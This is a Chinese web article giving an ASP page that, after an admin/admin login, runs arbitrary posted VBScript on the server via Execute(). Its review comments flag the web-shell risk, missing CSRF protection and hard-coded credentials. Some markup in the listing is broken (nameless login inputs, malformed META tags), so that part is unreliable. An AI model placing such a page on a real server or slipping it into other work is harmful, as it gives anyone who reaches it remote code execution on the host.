编写一个asp代码执行器

网络整理 - 07-26

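保存为runasp.asp运行。账号和密码都是admin(写死在脚本开头的SUserName/Spassword里,保存前应先改掉),登录后输入代码就可执行。提交的代码会以站点进程的权限在服务器上直接执行,所以这个页面只适合放在本机或内网的开发测试环境,用完即删,不要留在对外的站点目录里。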

<% @ LANGUAGE="VBscript" %>
<%Option Explicit
response.buffer=true
' Page entry point. Dispatches on the ?action= query-string value:
'   GetCode  - emit the numeric check-code image (NumCodeJS) and nothing else
'   chkpass  - validate the login form via checkPass()
'   exit     - clear the session login flag
'   RunCode  - for a logged-in session, execute the submitted text as ASP code
' Any other value renders either the code-entry form or the login form.
'
' NOTE(review): the credentials below are hard-coded, identical to the published
' defaults, and compared as plain text in checkPass(). Whoever passes that check can
' run arbitrary server-side code, so these values are the only thing protecting the
' host. Replace them before the file is saved anywhere reachable, and restrict the
' page at the web-server level (localhost or an IP allow-list) rather than relying on
' this login alone.
dim Spassword,SUserName
    SUserName="admin"
    Spassword="admin"
dim SQLMutiStr
dim i
dim action
    action=request.querystring("action")

IF action="GetCode" then '---------TOT
    ' Image request issued by the login form; no HTML is written in this branch.
    NumCodeJS
ELSE '--------TOT
    Response.Write("<!DOCTYPE HTML PUBLIC ""-//W3C//DTD HTML 4.0 Transitional//EN"">")
    Response.Write("<HTML>")
    Response.Write("<HEAD>")
    Response.Write("<TITLE>ASP RunCode SCR V1.0 / Create By PaintBlue.Net V37</TITLE>")
    Response.Write("<METAGenerator"" CONTENT=""EditPlus,V37,PaintBlue.Net"">")
    Response.Write("<METAAuthor"" CONTENT=""V37,PaintBlue.Net"">")
    Response.Write("<METAKeywords"" CONTENT=""PaintBlue.Net,,V37,RunCode,ASP,script,BlueIdea.COM,Lfgbox.com"">")
    Response.Write("<METADescription"" CONTENT=""运行ASP代码的ASP脚本!"">")
    Response.Write("</HEAD>")
    Response.Write("<BODY bgcolor=#D4D0C8>")

    ' SQLMutiStr is the raw code text posted by the form; despite the name it is not SQL.
    SQLMutiStr=trim(Request.Form("SQLMutiStr"))
    ' Only attempt a login when the session is not already logged in.
    if session("login")="" and action="chkpass" then
        session("login")=checkPass()
    end if
    if action="exit" then session("login")=""
    ' session("login")="1" is the single gate in front of the execution branch below.
    if session("login")="1" then
            if action="RunCode" then 
                if SQLMutiStr="" then
                    Response.write "没有输入要运行的代码!"
                    Response.write "<br><br><a href=""javascript:window.history.back();"">返回运行页面</a><br><br>"
                    Response.write "<a href=""?action=exit"">退出登陆</a>"
                    response.end
                else
                    ' The posted text is treated like an ASP page: literal parts are written
                    ' out, script parts are handed to ExeCuteIt, which Execute()s them inside
                    ' this page. By design this is arbitrary server-side code execution for
                    ' any request that carries a logged-in session.
                    ' NOTE(review): nothing besides the session flag is checked here - no
                    ' per-session token ties the POST to the form this page rendered. If the
                    ' page is kept, add such a token and verify it before executing.
                    dim ExeStrArr
                    dim re
                    dim tempSQL,tempSQL2
                        dim scriptArr,scriptSubArr
                        tempSQL2=""
                    tempSQL=split(SQLMutiStr,vbcrlf)
                    ' A first line mentioning "language" is taken to be a page directive and
                    ' dropped; the remaining lines are concatenated without line breaks.
                    ' NOTE(review): tempSQL2 is seeded with tempSQL(1) and the loop also starts
                    ' at i=1, so that line is appended twice; tempSQL(1) does not exist when the
                    ' input is a single line. Confirm the intended behaviour.
                    if inStr(lcase(tempSQL(0)),"language")>0 then
                        tempSQL2=tempSQL(1)
                        if ubound(tempSQL)>1 then
                            for i=1 to ubound(tempSQL)
                                tempSQL2=tempSQL2&tempSQL(i)
                            next
                        end if
                        tempSQL2=trim(tempSQL2)
                    else
                        tempSQL2=SQLMutiStr
                    end if
                        ' Expand the output shorthand into an explicit response.write call.
                        tempSQL2=replace(tempSQL2,"<%"&"=","<"&"%response.write ")
                        ' Collapse runs of blank lines into a single line break.
                        do
                            tempSQL2=replace(tempSQL2,vbcrlf&vbcrlf,vbcrlf)
                        loop while instr(tempSQL2,vbcrlf&vbcrlf)>0
                            tempSQL2=trim(tempSQL2)
                            ' Wrap the text in empty script tags so that splitting on the
                            ' closing delimiter always yields "literal + script" chunks.
                            tempSQL2="<"&"%%"&">"&tempSQL2&"<"&"%%"&">"
                            scriptArr=split(tempSQL2,"%"&">")
                        dim ub,kub
                            ub=ubound(scriptArr)
                        ' In each chunk, element 0 is literal output and element 1 is code.
                        ' The literal part of chunk 0 is skipped (i>0).
                        for i=0 to ub-1
                            scriptSubArr=split(scriptArr(i),"<"&"%")
                            if i>0 then response.write (scriptSubArr(0))
                            ExeCuteIt(scriptSubArr(1))
                        next
                    call EndProc("<font color=#009900>代码运行完毕!</font>")
                end if
            else
                ' Logged in, no code submitted: show the entry form. The previously posted
                ' text is echoed through Server.Htmlencode so it cannot break out of the
                ' TEXTAREA.
                %>
                输入要运行的ASP代码:
                <FORM METHOD=POST ACTION="?action=RunCode">
                <TEXTAREA wrap='OFF' ROWS="20"><%=Server.Htmlencode(SQLMutiStr)%></TEXTAREA>
                <br>
                <INPUT TYPE="button" Value="LouOut">
                <INPUT TYPE="reset" Value="Clear">
                <INPUT TYPE="submit" value="Run AspCode">
                </FORM>
        <%    end if
    else
        ' Not logged in: only the login form is rendered.
        call loginmain()
    end if
        Response.write ("</BODY></HTML>")
END IF '-------TOT

SUB loginMain()
    ' Renders the login form, which posts to ?action=chkpass. The check-code image is
    ' requested from runasp.asp?action=GetCode with timer() appended to the URL so that
    ' each rendering requests the image under a different address.
    ' NOTE(review): as shown, the INPUT elements carry no NAME attributes and the third
    ' one has TYPE="GetCode", while checkPass() reads request.form("UserName"),
    ' ("Runpassword") and ("GetCode"). The attributes look lost or garbled in this
    ' listing - compare against the original file.
    ' NOTE(review): the form is submitted over whatever scheme the page was loaded
    ' with; over plain HTTP the credentials travel unencrypted.
    %>

        <FORM METHOD=POST ACTION="?action=chkpass"> UserName:<INPUT TYPE="text"><br>
         PassWord:<INPUT TYPE="password"><br>
        CheckCode:<INPUT TYPE="GetCode"><img src="runasp.asp?action=GetCode&Time=<%=timer()%>"><br>
        <br><img width=125 height=0><INPUT TYPE="submit" value=" Login "></FORM>
    <%   
End SUB

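function checkPass()
    ' Validates the posted login form.
    ' Returns "1" when the user name, password and check code all match. On any failure
    ' the login form is rendered again and EndProc ends the response, so control only
    ' returns to the caller on success.
    ' NOTE(review): SUserName/Spassword are hard-coded plain-text values set at the top
    ' of the page, and nothing here limits repeated attempts. Add attempt limiting or a
    ' lockout if this page is reachable by anyone but its owner.
    dim UserName,Runpassword,GetCode
    dim errinfo
    dim issuedCode,codeOk
    checkPass=""
    UserName=trim(request.form("UserName"))
    Runpassword=trim(request.form("Runpassword"))
    GetCode=request.form("GetCode")
    ' Take the issued check code out of the session before validating anything, so each
    ' code is good for one attempt whether that attempt succeeds or fails.
    issuedCode=Session("GetCode")
    Session("GetCode")=0
    if UserName="" or Runpassword="" then
        errinfo=errinfo&"<li>用户名和密码输入不能为空"
    end if
    if Not isnumeric(GetCode) then
        errinfo=errinfo&"<li>请输入数字校验码"
    end if
    if errinfo<>"" then
        call loginmain()
        EndProc errinfo
    end if
    ' An unset (Empty) or already-cleared (0) session value must never satisfy the
    ' comparison; only a positive code stored by NumCodeJS is accepted.
    codeOk=false
    if not isempty(issuedCode) then
        if isnumeric(issuedCode) then
            if issuedCode>0 then codeOk=(issuedCode=int(GetCode))
        end if
    end if
    if action="chkpass" and codeOk and UserName=SUserName and Runpassword=Spassword then
        checkPass="1"
    else
        call loginmain()
        EndProc "登陆失败!请重新确认正确输入"
    end if
End function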

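SUB    ExeCuteIt(ExString)
    ' Runs one script segment of the submitted text with VBScript Execute and, if it
    ' raises an error, prints the error description followed by the offending code.
    '
    ' NOTE(review): ExString comes straight from Request.Form. Execute on request data
    ' is arbitrary code execution in the security context of the web application; that
    ' is the purpose of this page, so it is flagged here rather than replaced. The login
    ' check in the page body is the only control in front of this call. A file where
    ' form input reaches Execute has the same shape as a web shell, so expect
    ' anti-malware and file-integrity tooling to report it, and treat an unexpected copy
    ' on a server as an incident.
    on error resume next
    err.clear
    Execute(ExString)
    if err.number<>0 then
        Response.write "<div style=""background-color: #ffeedd;padding: 6px;"">"
        Response.write "<hr size=1>"
        ' The description is encoded like the code below it, so text taken from the
        ' executed code cannot inject markup into the report.
        Response.write "出错信息:<li><font color=#ff0000>"&Server.HTMLEncode(err.description)&"</font>"
        Response.write "<hr size=1>"
        Response.write "出错代码:<li><font color=#0000ff>"&Htmlencode(ExString)&"</font>"
        Response.write "<hr size=1></div>"
        ' Do not let this error leak into the handling of the next segment.
        err.clear
    end if
    on error goto 0
end SUB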

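function HTMLEncode(reString)
    ' Encodes a string for display inside HTML and keeps its visual layout.
    ' Markup-significant characters become entities, spaces and tabs become
    ' non-breaking spaces, and line feeds become <BR> / paragraph breaks.
    ' Returns "" for Null.
    ' The replacement strings in the listing had been reduced to the literal characters
    ' (">" for ">", """ for the double quote), which left the function both
    ' syntactically broken and non-encoding; the entities are restored here.
    dim Str:Str=reString
    if not isnull(Str) then
        ' "&" goes first, otherwise the entities produced below would be re-encoded.
        Str = replace(Str, "&", "&amp;")
        Str = replace(Str, ">", "&gt;")
        Str = replace(Str, "<", "&lt;")
        Str = Replace(Str, CHR(32), "&nbsp;")
        Str = Replace(Str, CHR(9), "&nbsp;&nbsp;&nbsp;&nbsp;")
        Str = Replace(Str, CHR(34), "&quot;")    ' double quote
        Str = Replace(Str, CHR(39), "&#39;")    ' single quote
        ' Drop carriage returns so the line-feed rules below see LF only.
        Str = Replace(Str, CHR(13), "")
        Str = Replace(Str, CHR(10) & CHR(10), "</P><P> ")
        Str = Replace(Str, CHR(10), "<BR> ")
        HTMLEncode = Str
    else
        HTMLEncode=""
    end if
end function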

' Breakpoint-style debug helper: num=0 stops the page.
' Writes str followed by <br>; when num equals 0 the response is ended right after.
' str is written as-is (not HTML-encoded), so it is meant for trusted debug text.
Sub Response_write(str,num)
    response.write str&"<br>"
    if num=0 then
        response.end
    end if
end sub

SUB EndProc(info)
    ' Prints a closing message between two green rules, then the "back" and "log out"
    ' links, and ends the response so nothing after the call is executed.
    ' info is emitted as markup, not encoded; every caller in this file passes fixed
    ' strings, and it must stay that way unless encoding is added.
    dim rule
    rule="<hr size=1 color=#00aa00>"
    Response.write rule & info
    Response.write rule & "<a href=""javascript:window.history.back();"">返回运行页面</a><br><br>" & "<a href=""?action=exit"">退出登陆</a>"
    response.end
End SUB
%>
<script language="Jscript" runat="Server">
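function GetNO(num){
        // Builds the source text of an XBM (X BitMap) image showing the decimal digits
        // of num. Each digit is an 8x16 glyph; NumArray[d][row] is the hex byte for one
        // row of digit d. Rows are emitted top to bottom and, within a row, one byte
        // per digit from left to right.
        // The listing had a stray "]" in front of the first glyph row, which made the
        // array literal a syntax error; it is removed here.
        // Expects num to consist of the digits 0-9 only.
        var NumArray=[
                ["0","0","0","3c","66","66","66","66","66","66","66","66","3c","0","0","0"],
                ["0","0","0","30","38","30","30","30","30","30","30","30","30","0","0","0"],
                ["0","0","0","3c","66","60","60","30","18","c","6","6","7e","0","0","0"],
                ["0","0","0","3c","66","60","60","38","60","60","60","66","3c","0","0","0"],
                ["0","0","0","30","30","38","38","34","34","32","7e","30","78","0","0","0"],
                ["0","0","0","7e","6","6","6","3e","60","60","60","66","3c","0","0","0"],
                ["0","0","0","38","c","6","6","3e","66","66","66","66","3c","0","0","0"],
                ["0","0","0","7e","66","60","60","30","30","18","18","c","c","0","0","0"],
                ["0","0","0","3c","66","66","66","3c","66","66","66","66","3c","0","0","0"],
                ["0","0","0","3c","66","66","66","66","7c","60","60","30","1c","0","0","0"]
                ];
        var CRLF=String.fromCharCode(13,10);
        var bytes=[];
        var digits=String(num).split("");
        for(var row=0;row<NumArray[0].length;row++)
                for(var col=0;col<digits.length;col++)
                        bytes[bytes.length]=("0x"+NumArray[digits[col]][row]);
        // Width is 8 pixels per digit; height is the fixed glyph height.
        var str1="#define counter_width "+digits.length*8;
        var str2="#define counter_height 16";
        return str1+CRLF+str2+CRLF+"static unsigned char counter_bits[]={"+bytes.join(",")+"}";
        }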
function GetRnd(Num){
        // Returns a pseudo-random integer in the range [0, 10^Num), i.e. a number with
        // at most Num decimal digits.
        // Math.random() is not a cryptographic generator, so the result is unsuitable
        // as a secret; here it only feeds the login check code.
        var upperBound=Math.pow(10,Num);
        var scaled=Math.random()*upperBound;
        return Math.floor(scaled);
        }
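function NumCodeJS()
    {
    // Issues a new login check code: picks a number, stores it in Session("GetCode")
    // for checkPass() to compare against, and writes it to the response as an XBM image.
    // Changes from the listing: the duplicate "var zNum" and the duplicate session
    // assignment are removed, and values below 1000 are shifted by 1000 instead of 999
    // so the code always has four digits (0 used to become the three-digit 999).
    // NOTE(review): the digits are fixed, undistorted 8x16 glyphs and the number comes
    // from Math.random(), so this check adds little against automated submissions.
    // Rely on attempt limiting for that.
    // NOTE(review): image/x-xbitmap is, to my knowledge, no longer rendered by current
    // browsers. Confirm with the browsers actually in use.
    Response.buffer=true;
    var zNum=GetRnd(4);
    if (zNum<1000) zNum+=1000;
    Session("GetCode") = zNum;
    Response.ContentType="image/x-xbitmap";
    Response.Write(GetNO(zNum));
    }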
</script>